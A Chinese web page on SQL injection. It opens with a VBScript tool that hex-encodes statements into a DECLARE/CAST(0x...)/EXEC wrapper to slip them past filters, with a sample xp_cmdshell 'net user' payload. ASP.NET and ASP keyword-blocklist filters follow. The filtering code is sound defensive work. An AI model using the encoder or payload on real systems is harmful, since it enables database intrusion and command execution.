SQL注入之SQL语句转十六进制

SQL注入之SQL语句转十六进制
HTML代码
<script language=vbs>
' Takes the statement entered on the page, hex-encodes it with Str2Hex and writes out a
' T-SQL wrapper of the form
'   DECLARE @S NVARCHAR(4000) SET @S=CAST(0x<hex> AS NVARCHAR(4000)) EXEC(@S)
' The wrapped statement does not appear in clear text in the generated string, but the
' wrapper keywords (DECLARE, CAST(, EXEC) and the long 0x literal do; those are the parts
' a request filter or a log search can still match on.
sub sqlencode()
Dim strTest
' NOTE(review): "1.value" looks truncated by page extraction; presumably it referred to the
' text1 input of form1 - confirm against the original page.
strTest = 1.value
' myHex is assigned here without a Dim statement.
myHex = Str2Hex(strTest)
document.write "<pre>DECLARE @S NVARCHAR(4000) SET @S=CAST(0x"&myhex&" AS NVARCHAR(4000)) EXEC(@S)
</pre>"
end sub
' Returns strHex rewritten as a hexadecimal string: for every character the result gets
' Hex(Asc(character)) followed by the literal "00".
' The trailing "00" per character gives the two-bytes-per-character layout that the caller
' places inside CAST(0x... AS NVARCHAR(4000)).
Function Str2Hex(ByVal strHex)
Dim sHex
' The loop counter i is used without a Dim statement.
For i = 1 To Len(strHex)
sHex = sHex & Hex(Asc(Mid(strHex,i,1)))&"00"
Next
Str2Hex = sHex
End Function
</script>
<!-- Entry form for the converter script above: one text box (text1) pre-filled with a sample
     statement and a submit button whose handler attribute names sqlencode(). -->
<form name=form1 method="post">
<p>请输⼊sql语句,例⼦:</p><br>
<input type=text name=text1 value='exec master.dbo.xp_cmdshell "net user"--' size=100><input type=submit
οnclick=sqlencode()
value="给我转">
</form>
exp
原程序代码
转换后的代码
-- Sample output of the converter. The 0x literal holds two-byte, low-byte-first text;
-- decoded it reads "DECLARE @T VARCHAR(25", so the sample is cut off on this page.
-- The statement that EXEC(@S) would run is only readable after decoding the literal, which is
-- why request logs and detection rules should also match the wrapper itself
-- (DECLARE ... CAST(0x... AS NVARCHAR ...) ... EXEC(@S)).
DECLARE @S NVARCHAR(4000) SET
@S=CAST(0x4400450043004C0041005200450020004000540020005600410052004300480041005200280032003500 AS NVARCHAR(4000)) EXEC(@S)
ASP.NET防SQL注入程序代码(关键字过滤只是辅助手段,不能代替参数化查询)
using System;
using System.Configuration;
using System.Web;
using System.Globalization;
namespace Koray.SqlInject
{
/* public class SqlInject
{
}
*/
/// <summary>
/// HTTP module that passes every incoming request to <see cref="ProcessRequest"/> for
/// keyword screening before the rest of the pipeline runs.
/// </summary>
/// <remarks>
/// Keyword screening is an additional layer only; the data-access code still has to use
/// parameterized commands.
/// </remarks>
public class SqlstrAny : IHttpModule
{
    /// <summary>
    /// Subscribes the module to the application's BeginRequest event.
    /// </summary>
    /// <param name="application">The application instance the module is attached to.</param>
    public void Init(HttpApplication application)
    {
        application.BeginRequest += this.Application_BeginRequest;
    }

    /// <summary>
    /// Runs the request screening with a fresh <see cref="ProcessRequest"/> per request.
    /// </summary>
    private void Application_BeginRequest(Object source, EventArgs e)
    {
        ProcessRequest screening = new ProcessRequest();
        screening.StartProcessRequest();
    }

    /// <summary>
    /// The module holds no resources, so there is nothing to release.
    /// </summary>
    public void Dispose()
    {
    }
}
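/// <summary>
/// Screens the query string, form fields and cookies of the current request against a
/// configured keyword list and redirects to the configured error page when a keyword is found.
/// </summary>
/// <remarks>
/// This is a plain substring blacklist. It produces false positives on ordinary words that
/// contain a keyword and cannot recognise every encoding of a statement, so it is an extra
/// layer only: the data-access code still has to use parameterized commands.
/// </remarks>
public class ProcessRequest
{
    // appSettings["SqlInject"]: pipe-separated keyword list.
    private static string SqlStr = ReadRequiredSetting("SqlInject");

    // appSettings["SQLInjectErrPage"]: page a rejected request is redirected to.
    // Read through ConfigurationManager like the keyword list; the original used the
    // obsolete ConfigurationSettings class for this one value.
    private static string sqlErrorPage = ReadRequiredSetting("SQLInjectErrPage");

    // Keyword list split once at type initialisation instead of on every inspected value.
    private static readonly string[] blockedTerms = ParseBlockedTerms(SqlStr);

    /// <summary>
    /// Reads an appSettings value and fails with a clear message when it is missing.
    /// </summary>
    /// <param name="key">Name of the appSettings entry.</param>
    /// <returns>The configured value.</returns>
    /// <exception cref="InvalidOperationException">The entry does not exist.</exception>
    private static string ReadRequiredSetting(string key)
    {
        string value = System.Configuration.ConfigurationManager.AppSettings[key];
        if (value == null)
        {
            // Fail at start-up rather than run without a keyword list or error page.
            throw new InvalidOperationException("Missing appSettings entry: " + key);
        }
        return value;
    }

    /// <summary>
    /// Splits the pipe-separated keyword list into lower-cased entries.
    /// </summary>
    /// <param name="list">The raw configuration value.</param>
    /// <returns>The non-empty keywords, lower-cased.</returns>
    private static string[] ParseBlockedTerms(string list)
    {
        // Empty entries (for example from a trailing '|') are dropped: an empty keyword is a
        // substring of every value and would cause every non-empty value to be rejected.
        string[] terms = list.Split(new char[] { '|' }, StringSplitOptions.RemoveEmptyEntries);
        for (int i = 0; i < terms.Length; i++)
        {
            // Values are lower-cased before matching, so the keywords must be as well.
            terms[i] = terms[i].ToLowerInvariant();
        }
        return terms;
    }

    /// <summary>
    /// Tells whether the request declares a multipart/form-data body.
    /// </summary>
    /// <param name="request">The request to inspect.</param>
    /// <returns>true when the content type starts with "multipart/form-data".</returns>
    private bool IsUploadRequest(HttpRequest request)
    {
        return StringStartsWithAnotherIgnoreCase(request.ContentType, "multipart/form-data");
    }

    /// <summary>
    /// Case-insensitive "starts with" comparison used for the content type.
    /// </summary>
    /// <param name="s1">The string to test; may be null.</param>
    /// <param name="s2">The expected prefix.</param>
    /// <returns>true when <paramref name="s1"/> begins with <paramref name="s2"/>.</returns>
    private static bool StringStartsWithAnotherIgnoreCase(string s1, string s2)
    {
        if (s1 == null || s2 == null)
        {
            // string.Compare with a length throws when an operand is null.
            return false;
        }
        // Content types are protocol tokens, so compare ordinally rather than by culture.
        return string.Compare(s1, 0, s2, 0, s2.Length, StringComparison.OrdinalIgnoreCase) == 0;
    }

    #region Request screening

    /// <summary>
    /// Inspects the current request and redirects to the error page when a value is rejected.
    /// </summary>
    /// <remarks>
    /// When the inspection itself fails (for example the log file cannot be written) the
    /// request is ended with a fixed message instead of being processed.
    /// </remarks>
    public void StartProcessRequest()
    {
        HttpRequest Request = System.Web.HttpContext.Current.Request;
        HttpResponse Response = System.Web.HttpContext.Current.Response;
        string errorCode = null;
        try
        {
            errorCode = FindViolation(Request);
        }
        catch (Exception)
        {
            // The exception text is not sent to the client: it can contain server paths
            // and other internals.
            Response.Clear();
            Response.Write("CustomErrorPage Error");
            Response.End();
            return;
        }

        if (errorCode != null)
        {
            // Redirect(url) ends the response itself. It is issued outside the try block so
            // the thread abort it raises is not handled as an inspection failure.
            Response.Redirect(sqlErrorPage + "?errmsg=" + errorCode + "&sqlprocess=true");
        }
    }

    /// <summary>
    /// Walks query string, form and cookies and reports the first collection that holds a
    /// rejected value.
    /// </summary>
    /// <param name="request">The request to inspect.</param>
    /// <returns>
    /// "QueryStringError", "FormError" or "CookieError" for the first rejected value, or null
    /// when nothing was rejected.
    /// </returns>
    private string FindViolation(HttpRequest request)
    {
        // Query string parameters. Values are read by index so that an entry without a key
        // is inspected as well.
        if (request.QueryString != null)
        {
            for (int i = 0; i < request.QueryString.Count; i++)
            {
                if (IsRejected(request, request.QueryString.Keys[i], request.QueryString[i]))
                {
                    return "QueryStringError";
                }
            }
        }

        // Form fields. Only this step is skipped for multipart/form-data requests: the
        // Content-Type header is supplied by the client, so it must not switch off the
        // query-string and cookie checks as well.
        if (!IsUploadRequest(request) && request.Form != null)
        {
            for (int i = 0; i < request.Form.Count; i++)
            {
                if (IsRejected(request, request.Form.Keys[i], request.Form[i]))
                {
                    return "FormError";
                }
            }
        }

        // Cookies.
        if (request.Cookies != null)
        {
            for (int i = 0; i < request.Cookies.Count; i++)
            {
                // Log the cookie's value; concatenating the HttpCookie object itself only
                // records its type name.
                if (IsRejected(request, request.Cookies.Keys[i], request.Cookies[i].Value))
                {
                    return "CookieError";
                }
            }
        }

        return null;
    }

    /// <summary>
    /// Checks one value and writes the two log lines when it is rejected.
    /// </summary>
    /// <param name="request">The current request, used for the logged URL.</param>
    /// <param name="key">Name of the parameter or cookie; may be null.</param>
    /// <param name="value">The submitted value.</param>
    /// <returns>true when the value contains a blocked keyword.</returns>
    private bool IsRejected(HttpRequest request, string key, string value)
    {
        if (ProcessSqlStr(value))
        {
            return false;
        }
        logSqlstr(DateTime.Now.ToShortDateString() + " " + DateTime.Now.ToShortTimeString() + ":" + request.ServerVariables["Url"]);
        logSqlstr(key + "=" + value);
        return true;
    }

    /// <summary>
    /// Decides whether a submitted value is acceptable.
    /// </summary>
    /// <param name="Str">The submitted value.</param>
    /// <returns>
    /// true when the value is null, empty or contains none of the configured keywords;
    /// false when a keyword occurs anywhere in it.
    /// </returns>
    private bool ProcessSqlStr(string Str)
    {
        if (string.IsNullOrEmpty(Str))
        {
            // Nothing to inspect. The original ran into a NullReferenceException on null
            // and treated that as a rejection.
            return true;
        }

        // Invariant lower-casing and ordinal search keep the match independent of the
        // server's culture settings.
        string lowered = Str.ToLowerInvariant();
        foreach (string term in blockedTerms)
        {
            if (lowered.IndexOf(term, StringComparison.Ordinal) >= 0)
            {
                return false;
            }
        }
        return true;
    }

    /// <summary>
    /// Appends one line to the daily log file under /Log/.
    /// </summary>
    /// <param name="str">The text to record.</param>
    /// <remarks>
    /// The file is created inside the site (MapPath of "/Log/...") and receives submitted
    /// values, cookies included, so HTTP access to that folder should be denied.
    /// </remarks>
    private void logSqlstr(string str)
    {
        HttpRequest req = System.Web.HttpContext.Current.Request;
        string fileName = "/Log/log_" + DateTime.Now.ToShortDateString().Replace("/", "_") + ".log";
        fileName = req.MapPath(fileName);

        // Submitted values are untrusted: line breaks are written in escaped form so one
        // value cannot add extra, forged lines to the log.
        string line = (str ?? "").Replace("\r", "\\r").Replace("\n", "\\n");

        // Append mode creates the file when it is missing; the using block closes the
        // writer even when the write fails.
        using (System.IO.StreamWriter writer = new System.IO.StreamWriter(fileName, true, System.Text.Encoding.GetEncoding("utf-8")))
        {
            writer.WriteLine(line);
        }
    }

    #endregion
}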
}
在web.config中加入
<!-- SQLInject: pipe-separated keywords. The module lower-cases each submitted value and
     rejects it when any keyword occurs anywhere in it, so short entries such as mid, chr,
     update or master also reject ordinary words that contain them.
     SQLInjectErrPage: page a rejected request is redirected to. -->
<appSettings>
<add value="exec|insert|delete|update|chr|mid|master|truncate|declare|cast(|drop table" key="SQLInject" />
<add value="/error.aspx" key="SQLInjectErrPage" />
</appSettings>
<!-- Registers the module so it runs at the start of every request. In a complete
     web.config the httpModules element is placed inside system.web. -->
<httpModules>
<add name="SqlstrAny"  type="Koray.SqlInject.SqlstrAny,Koray.SqlInject"/>
</httpModules>
ASP防SQL注入代码
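' Screens the requested URL and query string for a fixed list of SQL / command keywords.
' On a match the request is appended to the daily error log, a notice is written to the
' client and the response is ended so the rest of the page does not run.
' Only the URL and the query string are examined; posted form fields and cookies are not
' inspected here. A keyword list is an extra layer only and does not replace parameterized
' queries in the data-access code.
' DateToStr, LoadFromFile, SaveToFileByGb2312 and getIP are defined elsewhere.
Sub SQLInject
    Dim strTemp, strCheck, errLogFile, rtnerr, RtnArr, ErrLogFileName
    Dim arrPatterns, strPattern, qsKey, blnSuspicious

    ErrLogFileName = "/Log/err_" & DateToStr(Now(), "Y-m-d") & ".log"

    ' Raw request line as sent by the client; this is also what gets logged.
    strTemp = ""
    strTemp = strTemp & Request.ServerVariables("URL")
    If Trim(Request.QueryString) <> "" Then strTemp = strTemp & "?" & Trim(Request.QueryString)
    strTemp = LCase(strTemp)

    ' Request.QueryString without a key is still URL-encoded, so the keywords that contain
    ' a space are compared against encoded text there. The decoded parameter values are
    ' therefore checked as well.
    strCheck = strTemp
    For Each qsKey In Request.QueryString
        strCheck = strCheck & vbLf & LCase(qsKey & "=" & Request.QueryString(qsKey))
    Next

    arrPatterns = Array("declare", "select", "insert into", "delete from", "count(", _
                        "drop table", "truncate", "mid(", "char(", "xp_cmdshell", _
                        "exec master", "net localgroup administrators", ":", "net user", "'")

    blnSuspicious = False
    For Each strPattern In arrPatterns
        If InStr(strCheck, strPattern) > 0 Then
            blnSuspicious = True
            Exit For
        End If
    Next

    If blnSuspicious Then
        ' Append to the existing log content, or start a new log.
        RtnArr = LoadFromFile(ErrLogFileName)
        If RtnArr(0) = 0 Then
            errLogFile = RtnArr(1)
        Else
            errLogFile = "start"
        End If
        errLogFile = errLogFile & vbCrLf & vbCrLf
        errLogFile = errLogFile & "IP:" & getIP() & " Time:" & CStr(Now()) & " Info:" & strTemp
        rtnerr = SaveToFileByGb2312(errLogFile, ErrLogFileName)

        ' getIP() is defined elsewhere; its result is HTML-encoded before being echoed in
        ' case it is taken from a client-supplied header.
        Response.Write "<html><title>Waring</title><body bgcolor=""EEEEEE"" leftmargin=""60"" topmargin=""30"">" & _
            "<font style=""font-size:16px;font-weight:bolder;color:blue;""><li>You has been submit a bad querystring!</li></font>" & _
            "<font style=""font-size:14px;font-weight:bolder;color:red;""><br><li>Your Ip Has been record!</li><br>" & _
            "<li>IP:" & Server.HTMLEncode(getIP()) & "</li><br> <li>Time:" & Now & "</li></font></body></html><!--AddTime:" & Now & "-->"

        ' Stop here; without this the page that called the Sub keeps executing with the
        ' flagged query string.
        Response.End
    End If
End Sub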
